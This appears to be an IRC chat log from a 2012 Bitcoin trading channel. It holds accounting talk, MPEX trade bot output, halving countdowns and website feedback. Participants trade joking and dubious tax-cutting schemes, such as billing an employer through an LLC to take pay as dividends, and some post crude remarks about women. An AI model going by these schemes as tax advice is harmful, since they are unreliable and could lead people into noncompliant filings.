house: http://youtu.be/NUnwFHplBg4 Nov 27 20:23:19 copumpkin well, only need to account for it if you hadn't filed the taxes for the prev years, but anyway! my q was strictly cause it went down Nov 27 20:23:28 no, it isn't about not filing them Nov 27 20:23:32 it's about actual discrepancies in procedures Nov 27 20:23:34 it's really annoying Nov 27 20:23:53 so you often need to depreciate things differently on your taxes and on your accounts Nov 27 20:24:00 or account for warranty expenses differently Nov 27 20:24:33 like if you have an asset, accounting standards have different ways you can depreciate it over time, but the taxes probably want a particular way called double-declining balance Nov 27 20:24:48 which means that it looks like you lost more money to depreciation on your taxes than you did on your accounts Nov 27 20:25:15 which means you paid less in taxes (Because they think you lost money to depreciation) today but your accounts don't show that depreciation because you used a different method on them Nov 27 20:25:30 i don't like using any diff method than the tax method. Nov 27 20:25:35 consequently i don't. Nov 27 20:25:40 so you file a deferred tax liability saying "um, the tax man thinks we lost way more money than we did this year and charged us less taxes, but we haven't lost it yet" Nov 27 20:25:55 that's the thing though, the IFRS has requirements for the depreciation method Nov 27 20:25:58 and US GAAP has other ones Nov 27 20:26:10 and they don't all mesh with the tax method Nov 27 20:26:15 sometimes they might ,depending on what kind of asset it is Nov 27 20:26:31 also, warranty expenses are fucked as well for different reasons Nov 27 20:26:48 but as long as you do everything the tax way you don't have a problem. Nov 27 20:27:58 no, you do, because then you aren't meeting the US GAAP/IFRS standards Nov 27 20:28:05 which means that auditors or the SEC might bitch Nov 27 20:28:06 ;;halfreward Nov 27 20:28:06 Estimated time of bitcoin block reward halving: Wed Nov 28 18:48:06 2012 UTC | Time remaining: 1 day, 0 hours, 20 minutes, and 0 seconds. Nov 27 20:28:13 if you're public or something Nov 27 20:28:32 maybe it works better in romania Nov 27 20:29:23 maybe smickles can provide a justification for the whole thing, but the best I can come up with is that a company's accounts serve a different purpose than its tax returns Nov 27 20:29:54 mostly it just feels stupid though :P Nov 27 20:30:05 but regardless, I need to know it, so I learn it Nov 27 20:30:09 [MPEX] [S.MPOE] 2345 @ 0.00051395 = 1.2052 BTC [-] Nov 27 20:30:10 [MPEX] [S.MPOE] 30050 @ 0.00051392 = 15.4433 BTC [-] Nov 27 20:30:11 [MPEX] [S.MPOE] 2405 @ 0.00051294 = 1.2336 BTC [-] Nov 27 20:30:44 copumpkin they may bitch, but you can't really get into trouble by sticking with the tax version. Nov 27 20:30:55 people in general don't do it because they'd like to present better numbers. Nov 27 20:31:02 at least that's my (limited) understanding Nov 27 20:31:09 ianaa Nov 27 20:31:41 well, the discrepances can both favor you or work against you Nov 27 20:31:51 that's why you can have deferred tax liabilities or assets Nov 27 20:32:21 Like many other common law countries, the United States government does not directly set accounting standards by statute. However, the U.S. Securities and Exchange Commission (SEC) requires that US GAAP be followed in financial reporting by publicly traded companies Nov 27 20:32:41 so if you're public, you can't just do what the taxes do Nov 27 20:32:42 a well, then that's the issue. Nov 27 20:33:01 oh well Nov 27 20:33:05 at least I'm not an accountant Nov 27 20:34:05 in truth, this deferred assets/liabilities game + the SPV game is pretty much 90% of why nobody knows what corps are reallty worth Nov 27 20:34:16 takes people like buffett a month of combing to get a rough idea. Nov 27 20:34:44 that's just cause he's an old fart and is dumb Nov 27 20:34:45 duh Nov 27 20:34:45 that's too generalized Nov 27 20:35:02 [MPEX] [S.MPOE] 2345 @ 0.00051816 = 1.2151 BTC [+] Nov 27 20:35:04 [MPEX] [S.MPOE] 1095 @ 0.00051822 = 0.5675 BTC [+] Nov 27 20:35:05 [MPEX] [S.MPOE] 5660 @ 0.00052068 = 2.947 BTC [+] Nov 27 20:35:07 "people like wb" = value investors. Nov 27 20:35:50 :P Nov 27 20:36:12 mircea_popescu: just follow the fibonacci numbers on the price graph and you'll make way more money anyway Nov 27 20:36:21 heh Nov 27 20:36:23 let the elliott wave guide you!! Nov 27 20:36:31 i actually am one of the value types. Nov 27 20:36:37 never put much stock in ta Nov 27 20:36:42 yeah, I'm just mocking TA :) Nov 27 20:37:19 S.DICE is over valued Nov 27 20:37:30 so is most everyone's mom. Nov 27 20:37:46 my mom rules Nov 27 20:37:53 she can beat up your mom Nov 27 20:38:07 lol Nov 27 20:38:40 how much for the pair ? Nov 27 20:45:03 [MPEX] [S.MPOE] 8650 @ 0.00051452 = 4.4506 BTC [-] Nov 27 20:45:04 [MPEX] [S.MPOE] 350 @ 0.00051298 = 0.1795 BTC [-] Nov 27 20:46:27 18:29 < copumpkin> maybe smickles can provide a justification for the whole thing, but the best I can come up with is that a company's accounts serve a different purpose than its tax returns <<< this is true, taxes are not handled the same way as responsible accounting Nov 27 20:48:05 [MPEX] [S.MPOE] 2345 @ 0.00052055 = 1.2207 BTC [+] Nov 27 20:48:06 [MPEX] [S.MPOE] 8155 @ 0.00052068 = 4.2461 BTC [+] Nov 27 20:49:01 18:30 < mircea_popescu> copumpkin they may bitch, but you can't really get into trouble by sticking with the tax version<<< the thing is, sticking to the tax version doesn't accurately represent the status of the company Nov 27 20:49:22 well... a representation is a representation smickles. Nov 27 20:49:55 all representations depend on presupositions to decode. Nov 27 20:51:26 heh, trying to move this to an ontological discussion? Nov 27 20:51:42 I prefer oncological discussion Nov 27 20:51:47 or odontological Nov 27 20:51:54 odometerological Nov 27 20:52:54 that too Nov 27 20:53:11 i really don't follow how anyone'd be foolish enough to sign two different accounting reports. Nov 27 20:53:16 you sign the tax one as being correct Nov 27 20:53:31 you then proceed to sign a different one, someone shows they contradict themselves and whoopla, you've perjured yourself. Nov 27 20:53:54 as long as you're required to sign off on the tax one, it's the one. anyone doesn't like it can stand on his head. Nov 27 20:54:06 but you sign the tax one saying that its correct in consideration of the way tax law says it has to be done Nov 27 20:54:26 i don't think you get signing statements Nov 27 20:54:29 you're not the president. Nov 27 20:54:36 you sign the real one saying it's correct to to the standards Nov 27 20:54:45 "correct to the best of your knowledge" is the usual formula. Nov 27 20:55:22 and, iirc, the 'tax one' is not usually a report, it's the filed tax forms Nov 27 20:55:31 but anyway. i guess such issues are why i;m neither an accountant nor would contemplate becoming one Nov 27 20:56:19 and why I see money in understanding them Nov 27 20:56:28 ;D Nov 27 20:56:45 my 6 btc offer still stands Nov 27 20:56:53 :P Nov 27 20:57:06 6 btc for what ? Nov 27 20:57:23 copumpkin: in order to consider that offer seriously, i'd have to know how far down i'd have to bring it Nov 27 20:57:37 15%! Nov 27 20:57:38 :P Nov 27 20:58:01 it might also be possible for next year's taxes, but not this years, as it could involve operating an off-shore company for the full year Nov 27 20:58:13 mircea_popescu: I'm offering him 6 btc to take my effective tax rate to 15% Nov 27 20:58:21 any more than that and it isn't worth it ;) Nov 27 20:58:44 iirc i paid 2.x% in 2011. Nov 27 20:58:51 that's not a bad rate Nov 27 20:58:55 I'll take it Nov 27 20:59:01 cost me a little more than 6 btc. Nov 27 20:59:04 smickles: 7 btc to get me to 2% Nov 27 20:59:21 i think it was something like 30. Nov 27 21:00:30 damn! Nov 27 21:00:32 I can't afford that Nov 27 21:00:49 scam moar. Nov 27 21:01:24 mircea_popescu: I have an offer for you. You lend me 100k btc, I pay you back 200k next week Nov 27 21:01:24 deal? Nov 27 21:01:36 perhaps I should've waited a little longer Nov 27 21:01:43 mircea_popescu: disregard that, I'll ask again in a bit Nov 27 21:01:49 i only take 7% a week. Nov 27 21:03:48 oh even cheaper for me Nov 27 21:03:51 [MPEX] [S.MPOE] 26500 @ 0.00051816 = 13.7312 BTC [-] Nov 27 21:03:52 okay, I pay you back 107k Nov 27 21:03:59 I mean, I'll ask that in a bit Nov 27 21:08:15 [MPEX] [S.MPOE] 1104 @ 0.00051816 = 0.572 BTC [-] Nov 27 21:08:15 [MPEX] [S.MPOE] 17996 @ 0.00051972 = 9.3529 BTC [+] Nov 27 21:09:39 copumpkin: are we talking, lowering it 18000 or lowering it more than that? Nov 27 21:09:56 hmm, haven't actually calculated Nov 27 21:10:27 well, you can calculate based on my 7 btc limit! Nov 27 21:10:29 >_> Nov 27 21:10:59 [MPEX] [S.MPOE] 9550 @ 0.00051972 = 4.9633 BTC [+] Nov 27 21:11:14 smickles: it's sort of joking around though, because I doubt it's possible to lower much, since I don't work for myself or have a company and can't really deduct most of my expenses Nov 27 21:11:25 which is where I think most of that sort of goodness comes from Nov 27 21:11:34 if my assumptions are correct, as well as you not taking advantage of various things, it might actually be possible Nov 27 21:11:40 [MPEX] [S.MPOE] 4100 @ 0.00051972 = 2.1309 BTC [+] Nov 27 21:11:48 like, how much do you contribute to your retirement fund? Nov 27 21:12:02 I have a pretty boring finanicial situation :) Nov 27 21:12:25 well, if you don't have an IRA, we can knock of 5000 right there Nov 27 21:12:34 yeah, I'm doing a backdoor roth IRA Nov 27 21:12:47 heh Nov 27 21:13:01 well, do you pay for childcare? Nov 27 21:13:31 nah, I'm unmarried, don't own a house, don't have children Nov 27 21:13:36 plastered your home in solar pannels yet? Nov 27 21:13:58 [MPEX] [S.MPOE] 1995 @ 0.00051298 = 1.0234 BTC [-] Nov 27 21:13:59 [MPEX] [S.MPOE] 12126 @ 0.00051294 = 6.2199 BTC [-] Nov 27 21:14:00 [MPEX] [S.MPOE] 24703 @ 0.00051221 = 12.6531 BTC [-] Nov 27 21:14:08 ok, Nov 27 21:14:10 i've got it Nov 27 21:14:32 anyway, I was planning on maxing out the 401k pretax contribution next year, and squeezing more than is supposed to be possible into the roth Nov 27 21:15:10 adopt a kid, in a certain way, start an education fund for it, and hire a nanny, that's about 20000 of lowering Nov 27 21:15:30 but doesn't the nanny cost me money? Nov 27 21:15:37 :P Nov 27 21:15:51 can I get a virtual kid, like a tamatochi? Nov 27 21:16:01 heh, you didn't ask to make it better overall, you asked to get into the 15% bracket Nov 27 21:16:08 hah okay :P Nov 27 21:16:27 also, the nanny might be paid for by EIC, Nov 27 21:16:38 if we can find a cheap one Nov 27 21:17:01 what if I knock up 20 different girls and claim 20 kids Nov 27 21:17:13 but leave them to take care of them and don't pay childcare Nov 27 21:17:16 they'd have to all be born this year :| Nov 27 21:17:39 damn Nov 27 21:17:39 I need to get busy Nov 27 21:17:43 lots of premies coming Nov 27 21:18:31 I think my best bet is to set up some sort of S-corp or something and then do "consulting" on the side that lets me deduct a bunch of things Nov 27 21:18:33 would that make sense? Nov 27 21:19:07 I think you could also 'lend' a lot of money to your family, not charge interest, but be required to count a certain minimum amount of interest as income even tho you didn't charge it Nov 27 21:19:18 interesting Nov 27 21:19:19 copumpkin: yup Nov 27 21:19:24 all my family is abroad though Nov 27 21:19:26 does that affect things? Nov 27 21:20:00 you guys are reminding me that i need an accountant Nov 27 21:20:02 wait, why would counting additional income from non-existent interest be beneficial? Nov 27 21:20:06 a good one. Nov 27 21:20:12 jcpham: smickles! Nov 27 21:20:26 copumpkin: in this case, the corp should have all losses Nov 27 21:20:39 more expenses than income Nov 27 21:20:45 oh, I'd count it as being due but not getting collected Nov 27 21:20:47 and thus a loss? Nov 27 21:20:55 smickles is definitely my number one choice for ninja accountant Nov 27 21:21:35 well, your investment in the corp would lower your income, and the corp wouldn't pay taxes because only profit is taxed Nov 27 21:21:36 unfortunately, sending a bunch of money overseas to my parents will probably get me on a TSA watchlist for "funding terror" or something like that Nov 27 21:21:40 expenses are deducted Nov 27 21:22:33 my parents are terrifying Nov 27 21:22:35 and if we can't help but profit on this corp, we keep the money in the corp, and have it setup in ireland or somewhere good for taxes Nov 27 21:23:20 plus, we must not forget, you can deduct the cost of tax prep from last year Nov 27 21:23:23 hmm, that's an interesting idea Nov 27 21:23:37 I didn't spend much money on that :P Nov 27 21:23:46 bbl ;) Nov 27 21:23:52 ciao :) thanks Nov 27 21:27:21 [MPEX] [S.MPOE] 2345 @ 0.0005124 = 1.2016 BTC [+] Nov 27 21:27:22 [MPEX] [S.MPOE] 7483 @ 0.00051221 = 3.8329 BTC [-] Nov 27 21:31:02 [MPEX] [S.MPOE] 2345 @ 0.00051964 = 1.2186 BTC [+] Nov 27 21:31:04 [MPEX] [S.MPOE] 4655 @ 0.00051972 = 2.4193 BTC [+] Nov 27 21:31:38 copumpkin, learn them how to exchange bitcoins :P Nov 27 21:31:42 I made the jesus mint sauce Nov 27 21:32:23 moar like mint beurre blanc but sweet Nov 27 21:32:48 [MPEX] [S.MPOE] 2345 @ 0.00051951 = 1.2183 BTC [-] Nov 27 21:32:50 [MPEX] [S.MPOE] 11667 @ 0.00051972 = 6.0636 BTC [+] Nov 27 21:35:17 [MPEX] [S.MPOE] 8488 @ 0.00051972 = 4.4114 BTC [+] Nov 27 21:36:52 ;;halfreward Nov 27 21:36:53 Estimated time of bitcoin block reward halving: Wed Nov 28 19:06:53 2012 UTC | Time remaining: 23 hours, 30 minutes, and 0 seconds. Nov 27 21:36:59 dun dun dun Nov 27 21:37:10 .net Nov 27 21:41:08 [MPEX] [S.MPOE] 16700 @ 0.00052039 = 8.6905 BTC [+] Nov 27 21:41:10 [MPEX] [S.MPOE] 2000 @ 0.00052068 = 1.0414 BTC [+] Nov 27 21:42:08 smickles: what made you decide you wanted to go into accounting? Nov 27 21:46:06 he already had a hot gf Nov 27 21:46:14 hi Nov 27 21:47:33 [MPEX] [S.MPOE] 9835 @ 0.00052068 = 5.1209 BTC [+] Nov 27 21:47:34 [MPEX] [S.MPOE] 10615 @ 0.00052182 = 5.5391 BTC [+] Nov 27 21:48:44 [MPEX] [S.MPOE] 6100 @ 0.00052182 = 3.1831 BTC [+] Nov 27 21:56:37 heya Nov 27 21:58:37 [MPEX] [S.MPOE] 12785 @ 0.00052182 = 6.6715 BTC [+] Nov 27 21:58:39 [MPEX] [S.MPOE] 11415 @ 0.00052279 = 5.9676 BTC [+] Nov 27 22:06:35 [MPEX] [S.MPOE] 1235 @ 0.00052279 = 0.6456 BTC [+] Nov 27 22:06:37 [MPEX] [S.MPOE] 11150 @ 0.00052408 = 5.8435 BTC [+] Nov 27 22:06:38 [MPEX] [S.MPOE] 8300 @ 0.00052524 = 4.3595 BTC [+] Nov 27 22:06:39 [MPEX] [S.MPOE] 9569 @ 0.0005253 = 5.0266 BTC [+] Nov 27 22:08:29 [MPEX] [S.MPOE] 2869 @ 0.0005253 = 1.5071 BTC [+] Nov 27 22:08:30 [MPEX] [S.MPOE] 6650 @ 0.00052554 = 3.4948 BTC [+] Nov 27 22:08:32 [MPEX] [S.MPOE] 1000 @ 0.00052562 = 0.5256 BTC [+] Nov 27 22:08:33 [MPEX] [S.MPOE] 4431 @ 0.00052563 = 2.3291 BTC [+] Nov 27 22:12:20 [MPEX] [S.MPOE] 4932 @ 0.00052563 = 2.5924 BTC [+] Nov 27 22:12:49 https://bitcointalk.org/index.php?topic=128019.msg1361457#msg1361457 Nov 27 22:12:54 lol people like mpoe-pr nao ?! Nov 27 22:17:51 only her boobies Nov 27 22:18:15 as opposed to all the other girls people like not for their boobies Nov 27 22:18:20 but for the person they are deep inside. Nov 27 22:21:55 haha Nov 27 22:25:30 [MPEX] [S.MPOE] 2345 @ 0.0005202 = 1.2199 BTC [-] Nov 27 22:25:30 [MPEX] [S.MPOE] 1055 @ 0.00051993 = 0.5485 BTC [-] Nov 27 22:33:24 [MPEX] [S.MPOE] 2345 @ 0.00052021 = 1.2199 BTC [+] Nov 27 22:33:26 [MPEX] [S.MPOE] 1557 @ 0.00051993 = 0.8095 BTC [-] Nov 27 22:33:27 [MPEX] [S.MPOE] 20823 @ 0.00051991 = 10.8261 BTC [-] Nov 27 22:37:26 and buttons deployed Nov 27 22:37:29 http://www.namworld.net/ Nov 27 22:37:31 19:42 < copumpkin> smickles: what made you decide you wanted to go into accounting? <<< well, I actually like doing the work which is involved in most aspects of accounting. Also, once if figured out that it's actually a valuable service,... well, it seems like an honorable profession to me Nov 27 22:37:36 That should do it. Nov 27 22:38:06 s/if/I/ Nov 27 22:38:23 With valid HTML5 and CSS3 Nov 27 22:38:42 smickles: it is. Valuable services. Nov 27 22:39:05 Taxes and income reporting keeps getting more complex. Nov 27 22:39:55 smickles: cool, seems like a good reason :) Nov 27 22:40:05 Also just keeping records can be burdensome for large enterprises. Nov 27 22:40:21 Namjies: once they process my llc paperwork, i'll need a good webpage where people can order my services, it looks like you might be one of the peeps i ask for a bid on that from Nov 27 22:40:42 Namjies not bad but the logo sucks Nov 27 22:41:03 ... what do you want as a logo? Nov 27 22:41:12 woah, i just realized it's not "nameworld" Nov 27 22:41:15 i vote dildo Nov 27 22:41:21 i agree Nov 27 22:41:27 smh Nov 27 22:41:38 I'll keep it how it is... Nov 27 22:42:04 smickles, indeed. Nov 27 22:43:53 i don't mean the text, i mean the gfx Nov 27 22:44:06 it looks really out of place with the bootstrap style Nov 27 22:45:08 Hmm... odd. I see many websites with a logo similarly placed. I always liked it like that. Nov 27 22:45:27 not the placement either. Nov 27 22:46:04 Ah. What makes it look out of place? Nov 27 22:46:29 Im guessing mp has not seen my boobies comment yet Nov 27 22:47:59 Namjies i'm not an expert in design so i can't really cogently explain. it's a matter of style. Nov 27 22:48:09 maybe get a 2nd opinion from someone who knows shit. Nov 27 22:48:13 Diablo-D3 heh she's shown me. Nov 27 22:49:30 Eh, I just hoped you could explain what in the graphic bothered you when placed there. Like the contrast with the black background. Or anything like that. Nov 27 22:50:24 probably the sharp edges of the letters, their straightness, the spacing between M and W Nov 27 22:50:27 stuff like that Nov 27 22:50:36 OH DEAR GOD Nov 27 22:50:38 THE KERNING Nov 27 22:50:48 i can't recall the format to get bitcoind to show more than 10 transactions Nov 27 22:50:54 Diablo-D3 tho tbh... http://polimedia.us/dtng/c/src/135394065043.jpg Nov 27 22:50:57 anyone have an idea Nov 27 22:50:58 NAMJIES, SHTAPH Nov 27 22:51:08 JWU42: "*" 42 Nov 27 22:51:15 ahh Nov 27 22:51:19 forgot the " " Nov 27 22:51:23 dangit Nov 27 22:51:27 thks Diablo-D3 Nov 27 22:51:34 mircea_popescu: BOOBIES Nov 27 22:52:00 ah copumpkin I just thought of something Nov 27 22:52:10 http://polimedia.us/dtng/c/src/135250520562.jpg ? Nov 27 22:52:18 smickles: oh shit Nov 27 22:52:20 write it down! Nov 27 22:52:21 Ah, I see. Nov 27 22:52:36 I'm not positive on it, but ... you're a hireling, right? Nov 27 22:52:43 like you have a boss, Nov 27 22:52:46 yeah Nov 27 22:52:51 well, I'm "between jobs" right now Nov 27 22:52:52 mircea_popescu: BOOBIES! Nov 27 22:53:01 but I will have a boss :P Nov 27 22:53:36 and it will be a girl, and she'll be really hot, and he'll be really bothered. Nov 27 22:53:42 lol no Nov 27 22:53:45 it's an indian dude Nov 27 22:54:09 you are an employee of a company Nov 27 22:54:09 if you form an llc, and get your employer to hire the llc instead of you, and your llc pays you a low salary, but high dividends, you'd be taxed at 15% Nov 27 22:54:13 mircea_popescu: y is -pr not in irc? Nov 27 22:54:20 smickles: cute Nov 27 22:54:23 woa, lag Nov 27 22:54:32 FabianB what'd she do here ? Nov 27 22:54:36 Because mircea manage the IRC? Nov 27 22:54:37 smickles: I'm not sure I can pull that off, but it'd be amusing if I could Nov 27 22:54:49 smickles: but dividend rates are going up anyway, right? Nov 27 22:54:54 why couldn't you ?! Nov 27 22:54:55 yeah, but it'd help them too Nov 27 22:54:58 mircea_popescu: chat/gossip? Nov 27 22:55:05 they hire the llc as a contractor, Nov 27 22:55:19 they don't have to mess with witholding your taxes and such Nov 27 22:55:24 FabianB lol i am master of irc Nov 27 22:55:31 :) Nov 27 22:57:03 -pr comes around to irc ocassionally Nov 27 22:57:13 or someone pretending to be her Nov 27 22:57:16 smickles: interesting. I'll look into it, but it might complicate compliance issues and things like that Nov 27 22:57:26 [MPEX] [S.MPOE] 2345 @ 0.00052559 = 1.2325 BTC [+] Nov 27 22:57:28 [MPEX] [S.MPOE] 11783 @ 0.00052563 = 6.1935 BTC [+] Nov 27 22:57:29 [MPEX] [S.MPOE] 16772 @ 0.00052565 = 8.8162 BTC [+] Nov 27 22:57:39 smickles she used to join and say stuff on -otc Nov 27 22:57:43 copumpkin: it make it to where you'd have to keep track of your own taxes and pay quarterly estimates Nov 27 22:57:45 but kinda not worth the hassle. Nov 27 22:57:54 smickles: yeah, or hire someone else to do that for me :P Nov 27 22:58:01 could be worth it Nov 27 22:58:14 heh, that's what accountants are for :D Nov 27 22:58:18 http://polimedia.us/dtng/c/src/128227435041.jpg Nov 27 22:58:21 TORPEDOS Nov 27 22:58:37 smickles: how common is it to give hired LLCs bonuses and stuff like that? Nov 27 22:58:50 it seems like they'd typically be given fixed contract rates Nov 27 22:59:08 copumpkin: i'd have to do research, but i'm sure bonuses could easily be part of contracts Nov 27 22:59:14 hmm, fair enough Nov 27 22:59:27 usually you wouldnt get bonuses but you are paid more up front Nov 27 22:59:42 but bonuses are half the fun :) Nov 27 23:00:01 Diablo-D3 someone's been recently posting all these delicious healtyh women Nov 27 23:00:05 i've been enjoying. Nov 27 23:02:02 [MPEX] [S.MPOE] 2345 @ 0.00052564 = 1.2326 BTC [-] Nov 27 23:02:03 [MPEX] [S.MPOE] 14678 @ 0.00052565 = 7.7155 BTC [+] Nov 27 23:02:05 [MPEX] [S.MPOE] 6630 @ 0.0005261 = 3.488 BTC [+] Nov 27 23:02:54 so let's see here. worst case scenario : Nov 27 23:03:07 reward halves, bfl goes bankrupt, massive run on competitors, no asics till summer. Nov 27 23:03:17 btc price = 50 on july 1st, diff ~5mn ? Nov 27 23:04:17 if that's worst, what's best? Nov 27 23:04:53 BFL delivers in december, 1 other competitor also delivers by january, diif > 20 mn by july, btc ~ 15ish Nov 27 23:05:10 obviously "best" and "worst" are relative terms./ Nov 27 23:05:14 mircea_popescu: worst case senario, the reward halving causes so many people to stop mining, txns stagnate, killing the economy, by the time the diff adjusts or asics hit in full swing, no one is interested, price = .1 Nov 27 23:05:28 that's inconsistent internally. Nov 27 23:05:36 "mircea_popescu | btc price = 50 on july 1st, diff ~5mn ?" - if no new and useful services, I think it will be more like 5 EUR Nov 27 23:05:42 heh, probably Nov 27 23:06:02 EskimoBob http://trilema.com/2012/what-are-the-bitcoin-market-drivers/ Nov 27 23:06:03 seen that ? Nov 27 23:06:31 and that was b/f mircea knew SR was down for a long time Nov 27 23:07:19 no, I visited your site 3 months ago and it had pictures of rainbow ponies and I listing of some shares. Nov 27 23:07:34 Oh, and some porn Nov 27 23:07:43 it's not porn unless it's wet. Nov 27 23:07:44 don't forget the porn :) Nov 27 23:08:01 smickles indeed lol. Nov 27 23:08:08 how the fuck is this possibkle, 2 weeks offline Nov 27 23:08:24 [MPEX] [S.MPOE] 3158 @ 0.00052443 = 1.6561 BTC [-] Nov 27 23:08:27 [MPEX] [S.MPOE] 2345 @ 0.00052407 = 1.2289 BTC [-] Nov 27 23:08:29 [MPEX] [S.MPOE] 1147 @ 0.00052398 = 0.601 BTC [-] Nov 27 23:09:57 mircea_popescu: the time to install the *actual* honeypot equipment? Nov 27 23:10:30 fuck knows. Nov 27 23:10:46 when /. fucked up its db and had to reindex Nov 27 23:10:49 it was down ~6 hours. Nov 27 23:11:06 if you upgrade you sanely set up the new server first then unplug Nov 27 23:11:19 i never heard of two weeks before. Nov 27 23:12:55 [MPEX] [S.MPOE] 2345 @ 0.00052426 = 1.2294 BTC [+] Nov 27 23:12:55 [MPEX] [S.MPOE] 11305 @ 0.00052398 = 5.9236 BTC [-] Nov 27 23:21:18 https://bitcointalk.org/index.php?topic=115669.msg1361278#msg1361278 Nov 27 23:21:26 the nefario = satoshi argument lives on. Nov 27 23:21:58 lol, I find that hard to believe Nov 27 23:22:36 i find that very amusing Nov 27 23:22:56 think about it. pretty much the only funnier alternative is if boxxy made btc Nov 27 23:25:27 copumpkin: I don't consider the notion of nefario = satoshi to be any less plausible than gavin being satoshi Nov 27 23:28:55 no, no,no! it's meeeee! Nov 27 23:29:18 i still don't know how it happened Nov 27 23:29:41 LOL... OK, time to go. Have fun Nov 27 23:32:22 [MPEX] [S.MPOE] 14348 @ 0.00052398 = 7.5181 BTC [-] Nov 27 23:32:23 [MPEX] [S.MPOE] 7752 @ 0.00052341 = 4.0575 BTC [-] Nov 27 23:33:04 kuzetsa well that's for sure, seeing how it ain't gavin. Nov 27 23:34:10 kakobrekla "smpake.com looks like a great idea. I'll read up on it." Nov 27 23:34:18 https://bitcointalk.org/index.php?topic=125629.msg1361671#msg1361671 Nov 27 23:34:51 hm what is this Nov 27 23:34:57 is this dog? Nov 27 23:35:02 i think this is cat Nov 27 23:35:15 [MPEX] [S.MPOE] 24600 @ 0.0005235 = 12.8781 BTC [+] Nov 27 23:36:54 [MPEX] [S.MPOE] 18950 @ 0.00052341 = 9.9186 BTC [-] Nov 27 23:38:07 [MPEX] [S.MPOE] 16300 @ 0.00052341 = 8.5316 BTC [-] Nov 27 23:57:02 http://forums.digitalpoint.com/showthread.php?t=2599762#post18252095 Nov 27 23:57:09 doing some advertising for mpex/bitcoin on digitalpoint Nov 27 23:57:15 if anyone has an acct drop a bump :) Nov 28 00:09:55 [MPEX] [S.MPOE] 15500 @ 0.00052341 = 8.1129 BTC [-] Nov 28 00:11:25 [MPEX] [S.MPOE] 15098 @ 0.00052341 = 7.9024 BTC [-] Nov 28 00:11:27 [MPEX] [S.MPOE] 5233 @ 0.0005229 = 2.7363 BTC [-] Nov 28 00:45:37 digitalpoint... I stopped going there long ago Nov 28 01:16:33 Must not be cheap to advertise on Digitalpoint Nov 28 01:25:48 Namjies so-so. Nov 28 01:25:52 it all depends on results ofcourser Nov 28 01:29:31 Eh, not sure if digitalpoint is the best audience. Tell me about it when you get some data. Nov 28 01:30:03 well kinda what i'm doing, will publish the results if they suck. Nov 28 01:32:26 lol i see ciuciu is busy at work. Nov 28 01:33:32 ? Nov 28 01:34:06 http://forums.digitalpoint.com/showthread.php?t=2599762&p=18252251#post18252251 Nov 28 01:36:00 I keep saying mpex should be on it's own domain... Nov 28 01:36:21 People like 1 domain, 1 business Nov 28 01:36:35 Not like you don't have a MPEx domain... Nov 28 01:41:23 "people" Nov 28 01:43:15 people? Nov 28 01:43:16 http://youtu.be/r9LXD72i-1M Nov 28 01:48:40 haha indeed. Nov 28 01:51:29 Except in business, where it matters. Because you want their money. Nov 28 01:52:21 jesus Nov 28 01:52:26 reading a little in digitalpoint... Nov 28 01:52:35 it's like a reservation for the mentally retarded Nov 28 01:52:45 Don't start reading there... I was in there for some time... Nov 28 01:52:46 and i mean that literally. Nov 28 01:52:50 its -otc? Nov 28 01:53:02 how can make money from blog post ? Nov 28 01:53:02 hi Nov 28 01:53:02 as you know there is many websites regarding blog post , I don't know how should earn money through it ?!! Nov 28 01:53:02 if someone know please explain Nov 28 01:53:11 To make from Payperpost, you neeed to have a very good blog with big popularity and many readers, you must be a sort of influencer. Then, you propose your blog on Payperpost and if advertisers are interested to your blog, they will want to make a post in your blog. Nov 28 01:53:11 It is like that you can earn by Payperpost.com Nov 28 01:53:33 i wonder if they wear shoes with laces. Nov 28 01:54:05 brb ima scream at media buying. Nov 28 01:54:22 Many non-native english speakers. Nov 28 01:54:40 You can spot them easily. Nov 28 01:56:37 Also too much spam and Indians, some extremely good to top it. Even if most traffic is US, people are used to lower wages/prices for services. Nov 28 01:57:18 Consider it as majorly a US hiring freelancing Indians, at least for the marketplace. Nov 28 01:57:57 Although there's business from around the world, from what I remember, it's mostly that. Nov 28 02:05:20 or US to US Nov 28 02:07:11 doesn't seem too valuable in any case. Nov 28 02:31:25 mircea_popescu: what is your favorite video game to date? **** BEGIN LOGGING AT Wed Nov 28 03:26:05 2012 Nov 28 03:27:20 ;;halfreward Nov 28 03:27:22 Estimated time of bitcoin block reward halving: Wed Nov 28 19:17:21 2012 UTC | Time remaining: 17 hours, 50 minutes, and 0 seconds. Nov 28 03:46:01 ;;ticker Nov 28 03:46:02 BTCUSD ticker | Best bid: 12.23545, Best ask: 12.29000, Bid-ask spread: 0.05455, Last trade: 12.23545, 24 hour volume: 31807.77034213, 24 hour low: 11.90000, 24 hour high: 12.33900, 24 hour vwap: 12.10926 Nov 28 03:46:13 let the speculation begin Nov 28 03:48:43 heh back up is it Nov 28 04:00:38 smickles: \o/ the treasury stock method for calculating diluted EPS when you have warrants and/or employee stock options Nov 28 04:03:13 inb4 copumpkin writes himself warrants Nov 28 04:03:32 :O Nov 28 04:24:04 Question: which of the 3 formats do you prefer? Nov 28 04:24:08 http://www.namworld.net/printing Nov 28 04:26:07 regular 2 x 3.5 Nov 28 04:26:24 shar corners are better for picking your teeth wit Nov 28 04:26:37 I mean which of the 3 presentation design, you'll notice 3 times the same section Nov 28 04:28:35 i cant tell the diffrence Nov 28 04:30:19 what? Nov 28 04:30:38 scroll down Nov 28 04:31:04 There's 3 times the business cards section. Nov 28 04:31:55 definately the top is best Nov 28 04:32:55 [MPEX] [S.MPOE] 2345 @ 0.00052848 = 1.2393 BTC [+] Nov 28 04:32:55 [MPEX] [S.MPOE] 24663 @ 0.00052824 = 13.028 BTC [-] Nov 28 04:33:30 Hmm, thought so too. Nov 28 04:35:24 [MPEX] [S.MPOE] 2345 @ 0.0005289 = 1.2403 BTC [+] Nov 28 04:35:26 [MPEX] [S.MPOE] 7405 @ 0.00052913 = 3.9182 BTC [+] Nov 28 04:39:29 [MPEX] [S.MPOE] 2345 @ 0.00052834 = 1.239 BTC [-] Nov 28 04:39:31 [MPEX] [S.MPOE] 1069 @ 0.00052824 = 0.5647 BTC [-] Nov 28 04:39:32 [MPEX] [S.MPOE] 9890 @ 0.00052679 = 5.21 BTC [-] Nov 28 04:39:32 [MPEX] [S.MPOE] 6396 @ 0.00052652 = 3.3676 BTC [-] Nov 28 04:40:13 fuck mediawiki is a joke Nov 28 04:40:43 may as well not even have a search function Nov 28 04:41:20 http://whotookspaz.org/randomflash/Czechian_pop-hit.swf Nov 28 04:41:22 THE FUCK Nov 28 04:41:46 Well thanks pigeons Nov 28 04:42:10 Will leave it at that I guess. Nov 28 04:46:32 http://whotookspaz.org/randomflash/catttyy.swf Nov 28 